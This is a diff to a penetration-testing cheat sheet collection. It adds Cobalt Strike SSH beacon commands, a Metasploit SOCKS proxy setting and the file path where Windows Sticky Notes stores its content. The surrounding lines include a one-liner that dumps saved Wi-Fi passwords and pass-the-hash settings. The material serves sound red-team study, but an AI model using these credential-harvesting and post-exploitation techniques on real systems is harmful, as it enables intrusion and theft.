Sticky Notes Windows + Cobalt SMB

Methodology and Resources/Cobalt Strike - Cheatsheet.md

@@ -120,6 +120,27 @@ SMB Beacon uses Named Pipes. You might encounter these error code while running
 | 53         | Bad Netpath          | You have no trust relationship with the target system. It may or may not be a beacon there. |
 
 
+### SSH Beacon
+
+```powershell
+# deploy a beacon
+beacon> help ssh
+Use: ssh [target:port] [user] [pass]
+Spawn an SSH client and attempt to login to the specified target
+
+beacon> help ssh-key
+Use: ssh [target:port] [user] [/path/to/key.pem]
+Spawn an SSH client and attempt to login to the specified target
+
+# beacon's commands
+upload                    Upload a file
+download                  Download a file
+socks                     Start SOCKS4a server to relay traffic
+sudo                      Run a command via sudo
+rportfwd                  Setup a reverse port forward
+shell                     Execute a command via the shell
+```
+
 ### Metasploit compatibility
 
 * Payload: windows/meterpreter/reverse_http or windows/meterpreter/reverse_https

Methodology and Resources/Metasploit - Cheatsheet.md

@@ -16,6 +16,7 @@
     * [Execute from Memory](#execute-from-memory)
     * [Mimikatz](#mimikatz)
     * [Pass the Hash - PSExec](#pass-the-hash---psexec)
+    * [Use SOCKS Proxy](#use-socks-proxy)
 * [Scripting Metasploit](#scripting-metasploit)
 * [Multiple transports](#multiple-transports)
 * [Best of - Exploits](#best-of---exploits)
@@ -188,6 +189,12 @@ SMBPass               598ddce2660d3193aad3b435b51404ee:2d20d252a479f485cdf5e171d
 SMBUser               Lambda                                                             no        The username to authenticate as
 ```
 
+### Use SOCKS Proxy
+
+```powershell
+setg Proxies socks4:127.0.0.1:1080
+```
+
 ## Scripting Metasploit
 
 Using a `.rc file`, write the commands to execute, then run `msfconsole -r ./file.rc`.

Methodology and Resources/Windows - Privilege Escalation.md

@@ -18,6 +18,7 @@
     * [Search the registry for key names and passwords](#search-the-registry-for-key-names-and-passwords)
     * [Passwords in unattend.xml](#passwords-in-unattendxml)
     * [Wifi passwords](#wifi-passwords)
+    * [Sticky Notes passwords](#sticky-notes-passwords)
     * [Passwords stored in services](#passwords-stored-in-services)
     * [Powershell history](#powershell-history)
 * [EoP - Processes Enumeration and Tasks](#eop---processes-enumeration-and-tasks)
@@ -446,6 +447,10 @@ Oneliner method to extract wifi passwords from all the access point.
 cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on
 ```
 
+### Sticky Notes passwords
+
+The sticky notes app stores it's content in a sqlite db located at `C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite`
+
 ### Passwords stored in services
 
 Saved session information for PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP using [SessionGopher](https://github.com/Arvanaghi/SessionGopher)